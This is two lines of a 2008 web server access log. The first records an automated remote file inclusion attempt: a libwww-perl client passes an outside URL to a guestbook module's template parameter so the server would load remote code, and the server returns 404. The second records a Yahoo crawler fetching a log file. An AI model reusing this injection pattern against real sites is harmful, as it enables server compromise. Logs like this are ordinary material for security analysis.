64.38.24.138 - - [13/Mar/2008:08:52:51 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.30.232 - - [13/Mar/2008:08:53:04 -0700] "GET /logs/access_080126.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
